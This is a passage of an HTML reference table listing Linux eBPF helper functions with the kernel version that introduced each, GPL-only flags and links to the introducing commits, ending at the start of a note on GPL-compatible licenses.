<tr><td><code>BPF_FUNC_perf_event_read()</code></td><td>4.3</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/35578d7984003097af2b1e34502bc943d40c1804"><code>35578d798400</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_perf_event_read_value()</code></td><td>4.15</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/908432ca84fc229e906ba164219e9ad0fe56f755"><code>908432ca84fc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_perf_prog_read_value()</code></td><td>4.15</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/4bebdc7a85aa400c0222b5329861e4ad9252f1e5"><code>4bebdc7a85aa</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read()</code></td><td>4.1</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/2541517c32be2531e0da59dfd7efc1ce844644f5"><code>2541517c32be</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_kernel()</code></td><td>5.5</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/6ae08ae3dea2cfa03dd3665a3c8475c2d429ef47"><code>6ae08ae3dea2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_kernel_str()</code></td><td>5.5</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/6ae08ae3dea2cfa03dd3665a3c8475c2d429ef47"><code>6ae08ae3dea2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_user()</code></td><td>5.5</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/6ae08ae3dea2cfa03dd3665a3c8475c2d429ef47"><code>6ae08ae3dea2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_user_str()</code></td><td>5.5</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/6ae08ae3dea2cfa03dd3665a3c8475c2d429ef47"><code>6ae08ae3dea2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_read_str()</code></td><td>4.11</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/a5e8c07059d0f0b31737408711d44794928ac218"><code>a5e8c07059d0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_probe_write_user()</code></td><td>4.8</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/96ae52279594470622ff0585621a13e96b700600"><code>96ae52279594</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_rc_keydown()</code></td><td>4.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/f4364dcfc86df7c1ca47b256eaf6b6d0cdd0d936"><code>f4364dcfc86d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_rc_pointer_rel()</code></td><td>5.0</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/01d3240a04f4c09392e13c77b54d4423ebce2d72"><code>01d3240a04f4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_rc_repeat()</code></td><td>4.18</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/f4364dcfc86df7c1ca47b256eaf6b6d0cdd0d936"><code>f4364dcfc86d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_read_branch_records()</code></td><td>5.6</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/fff7b64355eac6e29b50229ad1512315bc04b44e"><code>fff7b64355ea</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_redirect()</code></td><td>4.4</td><td></td><td><a href="https://github.com/torvalds/linux/commit/27b29f63058d26c6c1742f1993338280d5a41dc6"><code>27b29f63058d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_redirect_map()</code></td><td>4.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/97f91a7cf04ff605845c20948b8a80e54cbd3376"><code>97f91a7cf04f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_redirect_neigh()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b4ab31414970a7a03a5d55d75083f2c101a30592"><code>b4ab31414970</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_redirect_peer()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/9aa1206e8f48222f35a0c809f33b2f4aaa1e2661"><code>9aa1206e8f48</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_reserve_hdr_opt()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0813a841566f0962a5551be7749b43c45f0022a0"><code>0813a841566f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_discard()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_discard_dynptr()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/bc34dee65a65e9c920c420005b8a43f2a721a458"><code>bc34dee65a65</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_output()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_query()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_reserve()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_reserve_dynptr()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/bc34dee65a65e9c920c420005b8a43f2a721a458"><code>bc34dee65a65</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_submit()</code></td><td>5.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/457f44363a8894135c85b7a9afd2bd8196db24ab"><code>457f44363a88</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_ringbuf_submit_dynptr()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/bc34dee65a65e9c920c420005b8a43f2a721a458"><code>bc34dee65a65</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_send_signal()</code></td><td>5.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8b401f9ed2441ad9e219953927a842d24ed051fc"><code>8b401f9ed244</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_send_signal_thread()</code></td><td>5.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8482941f09067da42f9c3362e15bfb3f3c19d610"><code>8482941f0906</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_seq_printf()</code></td><td>5.7</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/492e639f0c222784e2e0f121966375f641c61b15"><code>492e639f0c22</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_seq_printf_btf()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/eb411377aed9e27835e77ee0710ee8f4649958f3"><code>eb411377aed9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_seq_write()</code></td><td>5.7</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/492e639f0c222784e2e0f121966375f641c61b15"><code>492e639f0c22</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_set_hash()</code></td><td>4.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/ded092cd73c2c56a394b936f86897f29b2e131c0"><code>ded092cd73c2</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_set_hash_invalid()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7a4b28c6cc9ffac50f791b99cc7e46106436e5d8"><code>7a4b28c6cc9f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_set_retval()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b44123b4a3dcad4664d3a0f72c011ffd4c9c4d93"><code>b44123b4a3dc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_setsockopt()</code></td><td>4.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/8c4b4c7e9ff0447995750d9329949fa082520269"><code>8c4b4c7e9ff0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_ancestor_cgroup_id()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f307fa2cb4c935f7f1ff0aeb880c7b44fb9a642b"><code>f307fa2cb4c9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_assign()</code></td><td>5.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/cf7fbe660f2dbd738ab58aea8e9b0ca6ad232449"><code>cf7fbe660f2d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_cgroup_id()</code></td><td>5.7</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f307fa2cb4c935f7f1ff0aeb880c7b44fb9a642b"><code>f307fa2cb4c9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_fullsock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/46f8bc92758c6259bcf945e9216098661c1587cd"><code>46f8bc92758c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_lookup_tcp()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6acc9b432e6714d72d7d77ec7c27f6f8358d0c71"><code>6acc9b432e67</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_lookup_udp()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6acc9b432e6714d72d7d77ec7c27f6f8358d0c71"><code>6acc9b432e67</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_redirect_hash()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/81110384441a59cff47430f20f049e69b98c17f4"><code>81110384441a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_redirect_map()</code></td><td>4.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/174a79ff9515f400b9a6115643dafd62a635b7e6"><code>174a79ff9515</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_release()</code></td><td>4.20</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6acc9b432e6714d72d7d77ec7c27f6f8358d0c71"><code>6acc9b432e67</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_select_reuseport()</code></td><td>4.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/2dbb9b9e6df67d444fbe425c7f6014858d337adf"><code>2dbb9b9e6df6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_storage_delete()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6ac99e8f23d4b10258406ca0dd7bffca5f31da9d"><code>6ac99e8f23d4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sk_storage_get()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6ac99e8f23d4b10258406ca0dd7bffca5f31da9d"><code>6ac99e8f23d4</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_adjust_room()</code></td><td>4.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/2be7e212d5419a400d051c84ca9fdd083e5aacac"><code>2be7e212d541</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_ancestor_cgroup_id()</code></td><td>4.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7723628101aaeb1d723786747529b4ea65c5b5c5"><code>7723628101aa</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_change_head()</code></td><td>4.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3a0af8fd61f90920f6fa04e4f1e9a6a73c1b4fd2"><code>3a0af8fd61f9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_change_proto()</code></td><td>4.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/6578171a7ff0c31dc73258f93da7407510abf085"><code>6578171a7ff0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_change_tail()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/5293efe62df81908f2e90c9820c7edcc8e61f5e9"><code>5293efe62df8</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_change_type()</code></td><td>4.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d2485c4242a826fdf493fd3a27b8b792965b9b9e"><code>d2485c4242a8</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_cgroup_classid()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b426ce83baa7dff947fb354118d3133f2953aac8"><code>b426ce83baa7</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_cgroup_id()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/cb20b08ead401fd17627a36f035c0bf5bfee5567"><code>cb20b08ead40</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_ecn_set_ce()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/f7c917ba11a67632a8452ea99fe132f626a7a2cc"><code>f7c917ba11a6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_get_tunnel_key()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d3aa45ce6b94c65b83971257317867db13e5f492"><code>d3aa45ce6b94</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_get_tunnel_opt()</code></td><td>4.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/14ca0751c96f8d3d0f52e8ed3b3236f8b34d3460"><code>14ca0751c96f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_get_xfrm_state()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/12bed760a78da6e12ac8252fec64d019a9eac523"><code>12bed760a78d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_load_bytes()</code></td><td>4.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/05c74e5e53f6cb07502c3e6a820f33e2777b6605"><code>05c74e5e53f6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_load_bytes_relative()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e1ec56cdc59746943b2acfab3c171b930187bbe"><code>4e1ec56cdc59</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_output()</code></td><td>5.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/a7658e1a4164ce2b9eb4a11aadbba38586e93bd6"><code>a7658e1a4164</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_pull_data()</code></td><td>4.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/36bbef52c7eb646ed6247055a2acd3851e317857"><code>36bbef52c7eb</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_set_tstamp()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/9bb984f28d5bcb917d35d930fcfb89f90f9449fd"><code>9bb984f28d5b</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_set_tunnel_key()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d3aa45ce6b94c65b83971257317867db13e5f492"><code>d3aa45ce6b94</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_set_tunnel_opt()</code></td><td>4.6</td><td></td><td><a href="https://github.com/torvalds/linux/commit/14ca0751c96f8d3d0f52e8ed3b3236f8b34d3460"><code>14ca0751c96f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_store_bytes()</code></td><td>4.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/91bc4822c3d61b9bb7ef66d3b77948a4f9177954"><code>91bc4822c3d6</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_under_cgroup()</code></td><td>4.8</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4a482f34afcc162d8456f449b137ec2a95be60d8"><code>4a482f34afcc</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_vlan_pop()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e10df9a60d96ced321dd2af71da558c6b750078"><code>4e10df9a60d9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skb_vlan_push()</code></td><td>4.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e10df9a60d96ced321dd2af71da558c6b750078"><code>4e10df9a60d9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_lookup_tcp()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/edbf8c01de5a104a71ed6df2bf6421ceb2836a8e"><code>edbf8c01de5a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_mctcp_sock()</code></td><td>5.19</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3bc253c2e652cf5f12cd8c00d80d8ec55d67d1a7"><code>3bc253c2e652</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_tcp_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/478cfbdf5f13dfe09cfd0b1cbac821f5e27f6108"><code>478cfbdf5f13</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_tcp_request_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/478cfbdf5f13dfe09cfd0b1cbac821f5e27f6108"><code>478cfbdf5f13</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_tcp_timewait_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/478cfbdf5f13dfe09cfd0b1cbac821f5e27f6108"><code>478cfbdf5f13</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_tcp6_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/af7ec13833619e17f03aa73a785a2f871da6d66b"><code>af7ec1383361</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_udp6_sock()</code></td><td>5.9</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0d4fad3e57df2bf61e8ffc8d12a34b1caf9b8835"><code>0d4fad3e57df</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_skc_to_unix_sock()</code></td><td>5.16</td><td></td><td><a href="https://github.com/torvalds/linux/commit/9eeb3aa33ae005526f672b394c1791578463513f"><code>9eeb3aa33ae0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_snprintf()</code></td><td>5.13</td><td></td><td><a href="https://github.com/torvalds/linux/commit/7b15523a989b63927c2bb08e9b5b0bbc10b58bef"><code>7b15523a989b</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_snprintf_btf()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c4d0bfb45068d853a478b9067a95969b1886a30f"><code>c4d0bfb45068</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sock_from_file()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4f19cab76136e800a3f04d8c9aa4d8e770e3d3d8"><code>4f19cab76136</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sock_hash_update()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/81110384441a59cff47430f20f049e69b98c17f4"><code>81110384441a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sock_map_update()</code></td><td>4.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/174a79ff9515f400b9a6115643dafd62a635b7e6"><code>174a79ff9515</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_spin_lock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d83525ca62cf8ebe3271d14c36fb900c294274a2"><code>d83525ca62cf</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_spin_unlock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d83525ca62cf8ebe3271d14c36fb900c294274a2"><code>d83525ca62cf</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_store_hdr_opt()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0813a841566f0962a5551be7749b43c45f0022a0"><code>0813a841566f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_strncmp()</code></td><td>5.17</td><td></td><td><a href="https://github.com/torvalds/linux/commit/c5fb19937455095573a19ddcbff32e993ed10e35"><code>c5fb19937455</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_strtol()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d7a4cb9b6705a89937d12c8158a35a3145dc967a"><code>d7a4cb9b6705</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_strtoul()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/d7a4cb9b6705a89937d12c8158a35a3145dc967a"><code>d7a4cb9b6705</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sys_bpf()</code></td><td>5.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/79a7f8bdb159d9914b58740f3d31d602a6e4aca8"><code>79a7f8bdb159</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sys_close()</code></td><td>5.14</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3abea089246f76c1517b054ddb5946f3f1dbd2c0"><code>3abea089246f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sysctl_get_current_value()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/1d11b3016cec4ed9770b98e82a61708c8f4926e7"><code>1d11b3016cec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sysctl_get_name()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/808649fb787d918a48a360a668ee4ee9023f0c11"><code>808649fb787d</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sysctl_get_new_value()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e63acdff864654cee0ac5aaeda3913798ee78f6"><code>4e63acdff864</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sysctl_set_new_value()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4e63acdff864654cee0ac5aaeda3913798ee78f6"><code>4e63acdff864</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tail_call()</code></td><td>4.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/04fd61ab36ec065e194ab5e74ae34a5240d992bb"><code>04fd61ab36ec</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_task_pt_regs()</code></td><td>5.15</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/dd6e10fbd9fb86a571d925602c8a24bb4d09a2a7"><code>dd6e10fbd9f</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_task_storage_delete()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4cf1bc1f10452065a29d576fc5693fc4fab5b919"><code>4cf1bc1f1045</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_task_storage_get()</code></td><td>5.11</td><td></td><td><a href="https://github.com/torvalds/linux/commit/4cf1bc1f10452065a29d576fc5693fc4fab5b919"><code>4cf1bc1f1045</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_check_syncookie()</code></td><td>5.2</td><td></td><td><a href="https://github.com/torvalds/linux/commit/399040847084a69f345e0a52fd62f04654e0fce3"><code>399040847084</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_gen_syncookie()</code></td><td>5.3</td><td></td><td><a href="https://github.com/torvalds/linux/commit/70d66244317e958092e9c971b08dd5b7fd29d9cb#diff-05da4bf36c7fbcd176254e1615d98b28"><code>70d66244317e</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_raw_check_syncookie_ipv4()</code></td><td>6.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/33bf9885040c399cf6a95bd33216644126728e14"><code>33bf9885040c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_raw_check_syncookie_ipv6()</code></td><td>6.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/33bf9885040c399cf6a95bd33216644126728e14"><code>33bf9885040c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_raw_gen_syncookie_ipv4()</code></td><td>6.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/33bf9885040c399cf6a95bd33216644126728e14"><code>33bf9885040c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_raw_gen_syncookie_ipv6()</code></td><td>6.0</td><td></td><td><a href="https://github.com/torvalds/linux/commit/33bf9885040c399cf6a95bd33216644126728e14"><code>33bf9885040c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_send_ack()</code></td><td>5.5</td><td></td><td><a href="https://github.com/torvalds/linux/commit/206057fe020ac5c037d5e2dd6562a9bd216ec765"><code>206057fe020a</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_tcp_sock()</code></td><td>5.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/655a51e536c09d15ffa3603b1b6fce2b45b85a1f"><code>655a51e536c0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_this_cpu_ptr()</code></td><td>5.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/63d9b80dcf2c67bc5ade61cbbaa09d7af21f43f1"><code>63d9b80dcf2c</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_timer_init()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b00628b1c7d595ae5b544e059c27b1f5828314b4"><code>b00628b1c7d5</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_timer_set_callback()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b00628b1c7d595ae5b544e059c27b1f5828314b4"><code>b00628b1c7d5</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_timer_start()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b00628b1c7d595ae5b544e059c27b1f5828314b4"><code>b00628b1c7d5</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_timer_cancel()</code></td><td>5.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b00628b1c7d595ae5b544e059c27b1f5828314b4"><code>b00628b1c7d5</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_trace_printk()</code></td><td>4.1</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/9c959c863f8217a2ff3d7c296e8223654d240569"><code>9c959c863f82</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_trace_vprintk()</code></td><td>5.16</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/10aceb629e198429c849d5e995c3bb1ba7a9aaa3"><code>10aceb629e19</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_user_ringbuf_drain()</code></td><td>6.1</td><td></td><td><a href="https://github.com/torvalds/linux/commit/20571567384428dfc9fe5cf9f2e942e1df13c2dd"><code>205715673844</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_adjust_head()</code></td><td>4.10</td><td></td><td><a href="https://github.com/torvalds/linux/commit/17bedab2723145d17b14084430743549e6943d03"><code>17bedab27231</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_adjust_meta()</code></td><td>4.15</td><td></td><td><a href="https://github.com/torvalds/linux/commit/de8f3a83b0a0fddb2cf56e7a718127e9619ea3da"><code>de8f3a83b0a0</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_adjust_tail()</code></td><td>4.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b32cc5b9a346319c171e3ad905e0cddda032b5eb"><code>b32cc5b9a346</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_get_buff_len()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/0165cc817075cf701e4289838f1d925ff1911b3e"><code>0165cc817075</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_load_bytes()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3f364222d032eea6b245780e845ad213dab28cdd"><code>3f364222d032</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_store_bytes()</code></td><td>5.18</td><td></td><td><a href="https://github.com/torvalds/linux/commit/3f364222d032eea6b245780e845ad213dab28cdd"><code>3f364222d032</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_xdp_output()</code></td><td>5.6</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/d831ee84bfc9173eecf30dbbc2553ae81b996c60"><code>d831ee84bfc9</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_override_return()</code></td><td>4.16</td><td>GPL</td><td><a href="https://github.com/torvalds/linux/commit/9802d86585db91655c7d1929a4f6bbe0952ea88e"><code>9802d86585db</code></a></td></tr>
|
||
<tr><td><code>BPF_FUNC_sock_ops_cb_flags_set()</code></td><td>4.16</td><td></td><td><a href="https://github.com/torvalds/linux/commit/b13d880721729384757f235166068c315326f4a1"><code>b13d88072172</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<p>Note: GPL-only BPF helpers require a GPL-compatible license. The current licenses considered GPL-compatible by the kernel are:</p>
|
||
<ul>
|
||
